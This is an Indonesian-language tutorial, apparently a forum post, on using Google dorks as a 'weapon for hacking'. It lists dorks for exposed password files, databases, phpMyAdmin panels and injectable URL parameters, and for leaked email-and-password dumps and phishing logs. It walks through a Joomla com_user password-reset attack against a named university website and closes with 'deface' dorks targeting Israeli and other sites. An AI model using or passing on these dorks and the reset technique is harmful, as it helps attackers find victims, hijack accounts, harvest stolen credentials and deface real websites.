(Mencari suatu string yang terdapat pada url)

filetype

(Mencari suatu file secara lebih spesifik)

(www.google.c.id/help/faq_filetypes.html)

allintext

(Mencari suatu nilai string dalam suatu web)

site

(Mencari pada web tertentu)

link

(Mencari web2 yang mempunyai link pada web yang di pilih)

contoh dalam pengguunaannya:

Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini

intitle:"index of/avenged"

dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.

Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d

Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini

intitle:"index of" "skripsi" site:.ac.id

mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id

dan ini contoh2 lain dalam penggunaan google dork

inurl:"guest | book" "html allowed"

inurl:password.log

intitle:"index of" password.txt site:my

intitle:"index of" admin.mdb

intitle:"index of" member.mdb

intitle:"phpmyadmin" "running on localhost"

intitle:"index of" "data base" site:id

inurl:database.inc site:id

inurl:connector.txt site:id

site:id filetype:.doc


inurl:”spaw2/uploads/files/”
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"
index.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=

inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

home.php?seite=

sehingga kita bisa menggunakan google ini untk senjata hacking kita:

misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').

biasanya url ketika memasukan token tsb adlah

*******.com/index.php?option=com_user&view=reset&layout=confir m

di url tsb terdapat tulsan option=com_user

mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user

ketikan di google >>>>> inurl:"option=com_user"

dan akan terlihat hasilnya, kita ambil contoh pada web indonesia saja,

http://www.lbifib.ui.ac.id/index.php...ser&view=login

lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi

http://www.lbifib.ui.ac.id/index.php...layout=confirm

lalu ketikan token '

dan apa hasilnya, password sudah bisa kita reset ulang,,,,

sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.

Dork Email

filetype:txt @yahoo.com password:*

filetype:txt @ymail.com password:***

filetype:txt @yahoo.com password:***

filetype:txt @gmail.com password:*

filetype:txt @gmail.com password:*

filetype:txt email + password:* @gmail.com @yahoo.com

Dork Rapidshare

Expiration-date:*2010 +login: rapidshare.com

Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc

Dork Fake Login

Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork

search z di google dengan dork ini ^-^

DORK ->

intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"

Dork Untuk Defacing (The Best Dork)

Sebagian Dork untuk Aksi Deface

inurl:"id=" & intext:"Warning: preg_match() " site:.il

inurl:"id=" & intext:"Warning: ilesize() " site:.co.il

inurl:"id=" & intext:"Warning: filesize() " site:.co.il

inurl:"id=" & intext:"Warning: require() " site:.co.il

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il

inurl:"id=" & intext:"Warning: mysql_fetch_array() " site:.au

inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.co.il

inurl:"id=" & intext:"Warning: session_start() " site:.il

inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il

inurl:"id=" & intext:"Warning: is_writable() " site:.ca

inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il

inurl:"id=" & intext:"Warning: Unknown() " site:.il

inurl:"id=" & intext:"Warning: session_start() " site:.il

inurl:"id=" & intext:"Warning: mysql_result() " site:.il

inurl:"id=" & intext:"Warning: pg_exec() " site:.il

inurl:"id=" & intext:"Warning: mysql_result() " site:.il

inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.il

inurl:"id=" & intext:"Warning: mysql_query() " site:.il

inurl:"id=" & intext:"Warning: array_merge() " site:.co.il

Sekarang tinggal copy salah satu Dork diatas, di google.com/.co.id Etc & liat hasilnya ^_^